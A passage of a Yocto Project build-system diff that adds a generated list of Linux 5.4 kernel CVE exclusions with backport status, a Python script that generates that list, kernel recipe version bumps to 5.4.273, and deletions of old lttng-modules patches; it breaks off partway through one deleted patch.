9273# CVE-2024-26743 needs backporting (fixed from 6.8rc6)
9274
9275# CVE-2024-26744 needs backporting (fixed from 6.8rc6)
9276
9277# CVE-2024-26745 needs backporting (fixed from 6.8rc7)
9278
9279# fixed-version: only affects 6.4rc1 onwards
9280CVE_CHECK_WHITELIST += "CVE-2024-26746"
9281
9282# CVE-2024-26747 needs backporting (fixed from 6.8rc6)
9283
9284# cpe-stable-backport: Backported in 5.4.270
9285CVE_CHECK_WHITELIST += "CVE-2024-26748"
9286
9287# cpe-stable-backport: Backported in 5.4.270
9288CVE_CHECK_WHITELIST += "CVE-2024-26749"
9289
9290# fixed-version: only affects 6.8rc5 onwards
9291CVE_CHECK_WHITELIST += "CVE-2024-26750"
9292
9293# cpe-stable-backport: Backported in 5.4.270
9294CVE_CHECK_WHITELIST += "CVE-2024-26751"
9295
9296# cpe-stable-backport: Backported in 5.4.270
9297CVE_CHECK_WHITELIST += "CVE-2024-26752"
9298
9299# fixed-version: only affects 5.18rc1 onwards
9300CVE_CHECK_WHITELIST += "CVE-2024-26753"
9301
9302# cpe-stable-backport: Backported in 5.4.270
9303CVE_CHECK_WHITELIST += "CVE-2024-26754"
9304
9305# fixed-version: only affects 6.7rc1 onwards
9306CVE_CHECK_WHITELIST += "CVE-2024-26755"
9307
9308# CVE-2024-26756 needs backporting (fixed from 6.8rc6)
9309
9310# CVE-2024-26757 needs backporting (fixed from 6.8rc6)
9311
9312# CVE-2024-26758 needs backporting (fixed from 6.8rc6)
9313
9314# CVE-2024-26759 needs backporting (fixed from 6.8rc6)
9315
9316# fixed-version: only affects 5.19rc1 onwards
9317CVE_CHECK_WHITELIST += "CVE-2024-26760"
9318
9319# fixed-version: only affects 5.19rc1 onwards
9320CVE_CHECK_WHITELIST += "CVE-2024-26761"
9321
9322# fixed-version: only affects 6.7rc1 onwards
9323CVE_CHECK_WHITELIST += "CVE-2024-26762"
9324
9325# cpe-stable-backport: Backported in 5.4.270
9326CVE_CHECK_WHITELIST += "CVE-2024-26763"
9327
9328# cpe-stable-backport: Backported in 5.4.270
9329CVE_CHECK_WHITELIST += "CVE-2024-26764"
9330
9331# CVE-2024-26765 needs backporting (fixed from 6.8rc6)
9332
9333# cpe-stable-backport: Backported in 5.4.270
9334CVE_CHECK_WHITELIST += "CVE-2024-26766"
9335
9336# CVE-2024-26767 needs backporting (fixed from 6.8rc5)
9337
9338# CVE-2024-26768 needs backporting (fixed from 6.8rc4)
9339
9340# CVE-2024-26769 needs backporting (fixed from 6.8rc3)
9341
9342# CVE-2024-26770 needs backporting (fixed from 6.8rc3)
9343
9344# CVE-2024-26771 needs backporting (fixed from 6.8rc3)
9345
9346# cpe-stable-backport: Backported in 5.4.270
9347CVE_CHECK_WHITELIST += "CVE-2024-26772"
9348
9349# cpe-stable-backport: Backported in 5.4.270
9350CVE_CHECK_WHITELIST += "CVE-2024-26773"
9351
9352# CVE-2024-26774 needs backporting (fixed from 6.8rc3)
9353
9354# CVE-2024-26775 needs backporting (fixed from 6.8rc2)
9355
9356# CVE-2024-26776 needs backporting (fixed from 6.8rc2)
9357
9358# cpe-stable-backport: Backported in 5.4.270
9359CVE_CHECK_WHITELIST += "CVE-2024-26777"
9360
9361# cpe-stable-backport: Backported in 5.4.270
9362CVE_CHECK_WHITELIST += "CVE-2024-26778"
9363
9364# cpe-stable-backport: Backported in 5.4.270
9365CVE_CHECK_WHITELIST += "CVE-2024-26779"
9366
9367# fixed-version: only affects 6.8rc4 onwards
9368CVE_CHECK_WHITELIST += "CVE-2024-26780"
9369
9370# fixed-version: only affects 6.8rc6 onwards
9371CVE_CHECK_WHITELIST += "CVE-2024-26781"
9372
9373# fixed-version: only affects 5.6rc1 onwards
9374CVE_CHECK_WHITELIST += "CVE-2024-26782"
9375
9376# fixed-version: only affects 5.18rc1 onwards
9377CVE_CHECK_WHITELIST += "CVE-2024-26783"
9378
9379# CVE-2024-26784 needs backporting (fixed from 6.8rc7)
9380
9381# fixed-version: only affects 6.6rc1 onwards
9382CVE_CHECK_WHITELIST += "CVE-2024-26785"
9383
9384# fixed-version: only affects 6.6rc1 onwards
9385CVE_CHECK_WHITELIST += "CVE-2024-26786"
9386
9387# CVE-2024-26787 needs backporting (fixed from 6.8rc7)
9388
9389# cpe-stable-backport: Backported in 5.4.271
9390CVE_CHECK_WHITELIST += "CVE-2024-26788"
9391
9392# CVE-2024-26789 needs backporting (fixed from 6.8rc7)
9393
9394# cpe-stable-backport: Backported in 5.4.271
9395CVE_CHECK_WHITELIST += "CVE-2024-26790"
9396
9397# cpe-stable-backport: Backported in 5.4.271
9398CVE_CHECK_WHITELIST += "CVE-2024-26791"
9399
9400# fixed-version: only affects 6.8rc4 onwards
9401CVE_CHECK_WHITELIST += "CVE-2024-26792"
9402
9403# cpe-stable-backport: Backported in 5.4.271
9404CVE_CHECK_WHITELIST += "CVE-2024-26793"
9405
9406# fixed-version: only affects 6.8rc6 onwards
9407CVE_CHECK_WHITELIST += "CVE-2024-26794"
9408
9409# CVE-2024-26795 needs backporting (fixed from 6.8rc7)
9410
9411# fixed-version: only affects 6.6rc1 onwards
9412CVE_CHECK_WHITELIST += "CVE-2024-26796"
9413
9414# CVE-2024-26797 needs backporting (fixed from 6.8rc7)
9415
9416# CVE-2024-26798 needs backporting (fixed from 6.8rc7)
9417
9418# fixed-version: only affects 5.18rc1 onwards
9419CVE_CHECK_WHITELIST += "CVE-2024-26799"
9420
9421# fixed-version: only affects 6.8rc5 onwards
9422CVE_CHECK_WHITELIST += "CVE-2024-26800"
9423
9424# cpe-stable-backport: Backported in 5.4.271
9425CVE_CHECK_WHITELIST += "CVE-2024-26801"
9426
9427# CVE-2024-26802 needs backporting (fixed from 6.8rc7)
9428
9429# CVE-2024-26803 needs backporting (fixed from 6.8rc7)
9430
9431# cpe-stable-backport: Backported in 5.4.271
9432CVE_CHECK_WHITELIST += "CVE-2024-26804"
9433
9434# cpe-stable-backport: Backported in 5.4.271
9435CVE_CHECK_WHITELIST += "CVE-2024-26805"
9436
9437# CVE-2024-26806 needs backporting (fixed from 6.8rc7)
9438
9439# fixed-version: only affects 6.4rc1 onwards
9440CVE_CHECK_WHITELIST += "CVE-2024-26807"
9441
9442# CVE-2024-26808 needs backporting (fixed from 6.8rc2)
9443
9444# CVE-2024-26809 needs backporting (fixed from 6.9rc1)
9445
diff --git a/meta/recipes-kernel/linux/generate-cve-exclusions.py b/meta/recipes-kernel/linux/generate-cve-exclusions.py
new file mode 100755
index 0000000000..12ae3b0b1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/generate-cve-exclusions.py
@@ -0,0 +1,101 @@
1#! /usr/bin/env python3
2
3# Generate granular CVE status metadata for a specific version of the kernel
4# using data from linuxkernelcves.com.
5#
6# SPDX-License-Identifier: GPL-2.0-only
7
8import argparse
9import datetime
10import json
11import pathlib
12import re
13
14from packaging.version import Version
15
16
17def parse_version(s):
18 """
19 Parse the version string and either return a packaging.version.Version, or
20 None if the string was unset or "unk".
21 """
22 if s and s != "unk":
23 # packaging.version.Version doesn't approve of versions like v5.12-rc1-dontuse
24 s = s.replace("-dontuse", "")
25 return Version(s)
26 return None
27
28
29def main(argp=None):
30 parser = argparse.ArgumentParser()
31 parser.add_argument("datadir", type=pathlib.Path, help="Path to a clone of https://github.com/nluedtke/linux_kernel_cves")
32 parser.add_argument("version", type=Version, help="Kernel version number to generate data for, such as 6.1.38")
33
34 args = parser.parse_args(argp)
35 datadir = args.datadir
36 version = args.version
37 base_version = f"{version.major}.{version.minor}"
38
39 with open(datadir / "data" / "kernel_cves.json", "r") as f:
40 cve_data = json.load(f)
41
42 with open(datadir / "data" / "stream_fixes.json", "r") as f:
43 stream_data = json.load(f)
44
45 print(f"""
46# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
47# Generated at {datetime.datetime.now()} for version {version}
48
49python check_kernel_cve_status_version() {{
50 this_version = "{version}"
51 kernel_version = d.getVar("LINUX_VERSION")
52 if kernel_version != this_version:
53 bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
54}}
55do_cve_check[prefuncs] += "check_kernel_cve_status_version"
56""")
57
58 for cve, data in cve_data.items():
59 if "affected_versions" not in data:
60 print(f"# Skipping {cve}, no affected_versions")
61 print()
62 continue
63
64 affected = data["affected_versions"]
65 first_affected, last_affected = re.search(r"(.+) to (.+)", affected).groups()
66 first_affected = parse_version(first_affected)
67 last_affected = parse_version(last_affected)
68
69 handled = False
70 if not last_affected:
71 print(f"# {cve} has no known resolution")
72 elif first_affected and version < first_affected:
73 print(f"# fixed-version: only affects {first_affected} onwards")
74 handled = True
75 elif last_affected < version:
76 print(f"# fixed-version: Fixed after version {last_affected}")
77 handled = True
78 else:
79 if cve in stream_data:
80 backport_data = stream_data[cve]
81 if base_version in backport_data:
82 backport_ver = Version(backport_data[base_version]["fixed_version"])
83 if backport_ver <= version:
84 print(f"# cpe-stable-backport: Backported in {backport_ver}")
85 handled = True
86 else:
87 # TODO print a note that the kernel needs bumping
88 print(f"# {cve} needs backporting (fixed from {backport_ver})")
89 else:
90 print(f"# {cve} needs backporting (fixed from {last_affected})")
91 else:
92 print(f"# {cve} needs backporting (fixed from {last_affected})")
93
94 if handled:
95 print(f'CVE_CHECK_WHITELIST += "{cve}"')
96
97 print()
98
99
100if __name__ == "__main__":
101 main()
diff --git a/meta/recipes-kernel/linux/kernel-devsrc.bb b/meta/recipes-kernel/linux/kernel-devsrc.bb
index 951e7635cc..887e1e2430 100644
--- a/meta/recipes-kernel/linux/kernel-devsrc.bb
+++ b/meta/recipes-kernel/linux/kernel-devsrc.bb
@@ -177,7 +177,7 @@ do_install() {
177 cp -a --parents $SYSCALL_TOOLS $kerneldir/build/ 177 cp -a --parents $SYSCALL_TOOLS $kerneldir/build/
178 fi 178 fi
179 179
180 cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 180 cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 2>/dev/null || :
181 fi 181 fi
182 182
183 if [ -d arch/${ARCH}/include ]; then 183 if [ -d arch/${ARCH}/include ]; then
diff --git a/meta/recipes-kernel/linux/linux-dummy.bb b/meta/recipes-kernel/linux/linux-dummy.bb
index 95dc85ff2f..c56f8990de 100644
--- a/meta/recipes-kernel/linux/linux-dummy.bb
+++ b/meta/recipes-kernel/linux/linux-dummy.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
9 9
10PROVIDES += "virtual/kernel" 10PROVIDES += "virtual/kernel"
11 11
12inherit deploy 12inherit deploy linux-dummy
13 13
14PACKAGES_DYNAMIC += "^kernel-module-.*" 14PACKAGES_DYNAMIC += "^kernel-module-.*"
15PACKAGES_DYNAMIC += "^kernel-image-.*" 15PACKAGES_DYNAMIC += "^kernel-image-.*"
diff --git a/meta/recipes-kernel/linux/linux-yocto-dev.bb b/meta/recipes-kernel/linux/linux-yocto-dev.bb
index 06a9108fab..a1c0de9981 100644
--- a/meta/recipes-kernel/linux/linux-yocto-dev.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-dev.bb
@@ -10,8 +10,6 @@
10 10
11inherit kernel 11inherit kernel
12require recipes-kernel/linux/linux-yocto.inc 12require recipes-kernel/linux/linux-yocto.inc
13# for ncurses tests
14inherit pkgconfig
15 13
16# provide this .inc to set specific revisions 14# provide this .inc to set specific revisions
17include recipes-kernel/linux/linux-yocto-dev-revisions.inc 15include recipes-kernel/linux/linux-yocto-dev-revisions.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
index ec134e428c..f912304858 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
@@ -11,13 +11,13 @@ python () {
11 raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it") 11 raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
12} 12}
13 13
14SRCREV_machine ?= "0406e600800a40015d02b16ee6a4a46c6673c66f" 14SRCREV_machine ?= "c93e75bc334ba00df2d66411a0d79c4378cf4af8"
15SRCREV_meta ?= "4f6d6c23cc8ca5d9c39b1efc2619b1dfec1ef2bc" 15SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
16 16
17SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \ 17SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
18 git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" 18 git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
19 19
20LINUX_VERSION ?= "5.4.98" 20LINUX_VERSION ?= "5.4.273"
21 21
22LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" 22LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
23 23
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
index ff03fd4197..2f94782471 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
6 6
7require recipes-kernel/linux/linux-yocto.inc 7require recipes-kernel/linux/linux-yocto.inc
8 8
9LINUX_VERSION ?= "5.4.98" 9LINUX_VERSION ?= "5.4.273"
10LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" 10LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
11 11
12DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" 12DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
15KMETA = "kernel-meta" 15KMETA = "kernel-meta"
16KCONF_BSP_AUDIT_LEVEL = "2" 16KCONF_BSP_AUDIT_LEVEL = "2"
17 17
18SRCREV_machine_qemuarm ?= "fc95a485415d22eb772359b8d350c03b85c0cd1b" 18SRCREV_machine_qemuarm ?= "d29f3f3a932319053ad24d84b087b0a57908c1bc"
19SRCREV_machine ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 19SRCREV_machine ?= "b6480d09d84d09e7560daa5c1d73917292ae30c0"
20SRCREV_meta ?= "4f6d6c23cc8ca5d9c39b1efc2619b1dfec1ef2bc" 20SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
21 21
22PV = "${LINUX_VERSION}+git${SRCPV}" 22PV = "${LINUX_VERSION}+git${SRCPV}"
23 23
diff --git a/meta/recipes-kernel/linux/linux-yocto.inc b/meta/recipes-kernel/linux/linux-yocto.inc
index 91df9c1cd5..2978c2fb90 100644
--- a/meta/recipes-kernel/linux/linux-yocto.inc
+++ b/meta/recipes-kernel/linux/linux-yocto.inc
@@ -1,6 +1,7 @@
1SUMMARY = "Linux kernel" 1SUMMARY = "Linux kernel"
2SECTION = "kernel" 2SECTION = "kernel"
3LICENSE = "GPLv2" 3LICENSE = "GPLv2"
4HOMEPAGE = "https://www.yoctoproject.org/"
4 5
5LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7" 6LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7"
6 7
@@ -55,3 +56,6 @@ do_install_append(){
55 56
56# enable kernel-sample for oeqa/runtime/cases's ksample.py test 57# enable kernel-sample for oeqa/runtime/cases's ksample.py test
57KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc" 58KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc"
59
60# CVE exclusion
61include recipes-kernel/linux/cve-exclusion.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
index 76477f254d..108043bd98 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
@@ -1,6 +1,7 @@
1KBRANCH ?= "v5.4/standard/base" 1KBRANCH ?= "v5.4/standard/base"
2 2
3require recipes-kernel/linux/linux-yocto.inc 3require recipes-kernel/linux/linux-yocto.inc
4include recipes-kernel/linux/cve-exclusion_5.4.inc
4 5
5# board specific branches 6# board specific branches
6KBRANCH_qemuarm ?= "v5.4/standard/arm-versatile-926ejs" 7KBRANCH_qemuarm ?= "v5.4/standard/arm-versatile-926ejs"
@@ -12,16 +13,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base"
12KBRANCH_qemux86-64 ?= "v5.4/standard/base" 13KBRANCH_qemux86-64 ?= "v5.4/standard/base"
13KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64" 14KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64"
14 15
15SRCREV_machine_qemuarm ?= "28bc6b294bb1e49da671b2848234f9011efcad88" 16SRCREV_machine_qemuarm ?= "b7e0891bf4b281c4e29b86f708e10a3339670acc"
16SRCREV_machine_qemuarm64 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 17SRCREV_machine_qemuarm64 ?= "ff75f0c7beb167391f0285dd2993394cd143a8a7"
17SRCREV_machine_qemumips ?= "105568d1696f86625cf7bc30d8c5c921732de2f4" 18SRCREV_machine_qemumips ?= "650e43a19e625d1db9d8245cda27db7b86990398"
18SRCREV_machine_qemuppc ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 19SRCREV_machine_qemuppc ?= "0fb6546a09f90befecb11cd0f10274276e8a3021"
19SRCREV_machine_qemuriscv64 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 20SRCREV_machine_qemuriscv64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
20SRCREV_machine_qemux86 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 21SRCREV_machine_qemux86 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
21SRCREV_machine_qemux86-64 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 22SRCREV_machine_qemux86-64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
22SRCREV_machine_qemumips64 ?= "c76ba20ee1b1de859736f85f0210459c2104b8df" 23SRCREV_machine_qemumips64 ?= "f59947f338319b1741db5dfac34f08399561ab25"
23SRCREV_machine ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d" 24SRCREV_machine ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
24SRCREV_meta ?= "4f6d6c23cc8ca5d9c39b1efc2619b1dfec1ef2bc" 25SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
25 26
26# remap qemuarm to qemuarma15 for the 5.4 kernel 27# remap qemuarm to qemuarma15 for the 5.4 kernel
27# KMACHINE_qemuarm ?= "qemuarma15" 28# KMACHINE_qemuarm ?= "qemuarma15"
@@ -30,7 +31,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
30 git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}" 31 git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
31 32
32LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814" 33LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
33LINUX_VERSION ?= "5.4.98" 34LINUX_VERSION ?= "5.4.273"
34 35
35DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" 36DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
36DEPENDS += "openssl-native util-linux-native" 37DEPENDS += "openssl-native util-linux-native"
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch b/meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch
deleted file mode 100644
index 6f82488772..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch
+++ /dev/null
@@ -1,42 +0,0 @@
1From cb78974394a9af865e1d2d606e838dbec0de80e8 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 5 Oct 2020 15:31:42 -0400
4Subject: [PATCH 01/16] fix: strncpy equals destination size warning
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Some versions of GCC when called with -Wstringop-truncation will warn
10when doing a copy of the same size as the destination buffer with
11strncpy :
12
13 ‘strncpy’ specified bound 256 equals destination size [-Werror=stringop-truncation]
14
15Since we unconditionally write '\0' in the last byte, reduce the copy
16size by one.
17
18Upstream-Status: Backport
19
20Change-Id: Idb907c9550817a06fc0dffc489740f63d440e7d4
21Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
22Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
23---
24 lttng-syscalls.c | 2 +-
25 1 file changed, 1 insertion(+), 1 deletion(-)
26
27diff --git a/lttng-syscalls.c b/lttng-syscalls.c
28index 49c0d81b..b43dd570 100644
29--- a/lttng-syscalls.c
30+++ b/lttng-syscalls.c
31@@ -719,7 +719,7 @@ int fill_table(const struct trace_syscall_entry *table, size_t table_len,
32 ev.u.syscall.abi = LTTNG_KERNEL_SYSCALL_ABI_COMPAT;
33 break;
34 }
35- strncpy(ev.name, desc->name, LTTNG_KERNEL_SYM_NAME_LEN);
36+ strncpy(ev.name, desc->name, LTTNG_KERNEL_SYM_NAME_LEN - 1);
37 ev.name[LTTNG_KERNEL_SYM_NAME_LEN - 1] = '\0';
38 ev.instrumentation = LTTNG_KERNEL_SYSCALL;
39 chan_table[i] = _lttng_event_create(chan, &ev, filter,
40--
412.25.1
42
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch b/meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch
deleted file mode 100644
index 90d7b0cf9c..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch
+++ /dev/null
@@ -1,88 +0,0 @@
1From 8e4e8641961df32bfe519fd18d899250951acd1a Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 13:41:02 -0400
4Subject: [PATCH 02/16] fix: objtool: Rename frame.h -> objtool.h (v5.10)
5
6See upstream commit :
7
8 commit 00089c048eb4a8250325efb32a2724fd0da68cce
9 Author: Julien Thierry <jthierry@redhat.com>
10 Date: Fri Sep 4 16:30:25 2020 +0100
11
12 objtool: Rename frame.h -> objtool.h
13
14 Header frame.h is getting more code annotations to help objtool analyze
15 object files.
16
17 Rename the file to objtool.h.
18
19Upstream-Status: Backport
20
21Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
22Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
23Change-Id: Ic2283161bebcbf1e33b72805eb4d2628f4ae3e89
24---
25 lttng-filter-interpreter.c | 2 +-
26 wrapper/{frame.h => objtool.h} | 19 ++++++++++++-------
27 2 files changed, 13 insertions(+), 8 deletions(-)
28 rename wrapper/{frame.h => objtool.h} (50%)
29
30diff --git a/lttng-filter-interpreter.c b/lttng-filter-interpreter.c
31index 21169f01..5d572437 100644
32--- a/lttng-filter-interpreter.c
33+++ b/lttng-filter-interpreter.c
34@@ -8,7 +8,7 @@
35 */
36
37 #include <wrapper/uaccess.h>
38-#include <wrapper/frame.h>
39+#include <wrapper/objtool.h>
40 #include <wrapper/types.h>
41 #include <linux/swab.h>
42
43diff --git a/wrapper/frame.h b/wrapper/objtool.h
44similarity index 50%
45rename from wrapper/frame.h
46rename to wrapper/objtool.h
47index 6e6dc811..3b997cae 100644
48--- a/wrapper/frame.h
49+++ b/wrapper/objtool.h
50@@ -1,18 +1,23 @@
51-/* SPDX-License-Identifier: (GPL-2.0 or LGPL-2.1)
52+/* SPDX-License-Identifier: (GPL-2.0-only or LGPL-2.1-only)
53 *
54- * wrapper/frame.h
55+ * wrapper/objtool.h
56 *
57 * Copyright (C) 2016 Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
58 */
59
60-#ifndef _LTTNG_WRAPPER_FRAME_H
61-#define _LTTNG_WRAPPER_FRAME_H
62+#ifndef _LTTNG_WRAPPER_OBJTOOL_H
63+#define _LTTNG_WRAPPER_OBJTOOL_H
64
65 #include <linux/version.h>
66
67-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,6,0))
68-
69+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
70+#include <linux/objtool.h>
71+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,6,0))
72 #include <linux/frame.h>
73+#endif
74+
75+
76+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,6,0))
77
78 #define LTTNG_STACK_FRAME_NON_STANDARD(func) \
79 STACK_FRAME_NON_STANDARD(func)
80@@ -23,4 +28,4 @@
81
82 #endif
83
84-#endif /* _LTTNG_WRAPPER_FRAME_H */
85+#endif /* _LTTNG_WRAPPER_OBJTOOL_H */
86--
872.25.1
88
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch b/meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch
deleted file mode 100644
index 2a100361ea..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch
+++ /dev/null
@@ -1,316 +0,0 @@
1From 5a3b76a81fd3df52405700d369223d64c7a04dc8 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 27 Oct 2020 11:42:23 -0400
4Subject: [PATCH 03/16] fix: btrfs: tracepoints: output proper root owner for
5 trace_find_free_extent() (v5.10)
6
7See upstream commit :
8
9 commit 437490fed3b0c9ae21af8f70e0f338d34560842b
10 Author: Qu Wenruo <wqu@suse.com>
11 Date: Tue Jul 28 09:42:49 2020 +0800
12
13 btrfs: tracepoints: output proper root owner for trace_find_free_extent()
14
15 The current trace event always output result like this:
16
17 find_free_extent: root=2(EXTENT_TREE) len=16384 empty_size=0 flags=4(METADATA)
18 find_free_extent: root=2(EXTENT_TREE) len=16384 empty_size=0 flags=4(METADATA)
19 find_free_extent: root=2(EXTENT_TREE) len=8192 empty_size=0 flags=1(DATA)
20 find_free_extent: root=2(EXTENT_TREE) len=8192 empty_size=0 flags=1(DATA)
21 find_free_extent: root=2(EXTENT_TREE) len=4096 empty_size=0 flags=1(DATA)
22 find_free_extent: root=2(EXTENT_TREE) len=4096 empty_size=0 flags=1(DATA)
23
24 T's saying we're allocating data extent for EXTENT tree, which is not
25 even possible.
26
27 It's because we always use EXTENT tree as the owner for
28 trace_find_free_extent() without using the @root from
29 btrfs_reserve_extent().
30
31 This patch will change the parameter to use proper @root for
32 trace_find_free_extent():
33
34 Now it looks much better:
35
36 find_free_extent: root=5(FS_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
37 find_free_extent: root=5(FS_TREE) len=8192 empty_size=0 flags=1(DATA)
38 find_free_extent: root=5(FS_TREE) len=16384 empty_size=0 flags=1(DATA)
39 find_free_extent: root=5(FS_TREE) len=4096 empty_size=0 flags=1(DATA)
40 find_free_extent: root=5(FS_TREE) len=8192 empty_size=0 flags=1(DATA)
41 find_free_extent: root=5(FS_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
42 find_free_extent: root=7(CSUM_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
43 find_free_extent: root=2(EXTENT_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
44 find_free_extent: root=1(ROOT_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
45
46Upstream-Status: Backport
47
48Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
49Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
50Change-Id: I1d674064d29b31417e2acffdeb735f5052a87032
51---
52 instrumentation/events/lttng-module/btrfs.h | 206 ++++++++++++--------
53 1 file changed, 122 insertions(+), 84 deletions(-)
54
55diff --git a/instrumentation/events/lttng-module/btrfs.h b/instrumentation/events/lttng-module/btrfs.h
56index 7b290085..52fcfd0d 100644
57--- a/instrumentation/events/lttng-module/btrfs.h
58+++ b/instrumentation/events/lttng-module/btrfs.h
59@@ -1856,7 +1856,29 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserved_extent, btrfs_reserved_extent_f
60
61 #endif /* #else #if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0)) */
62
63-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
64+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0) || \
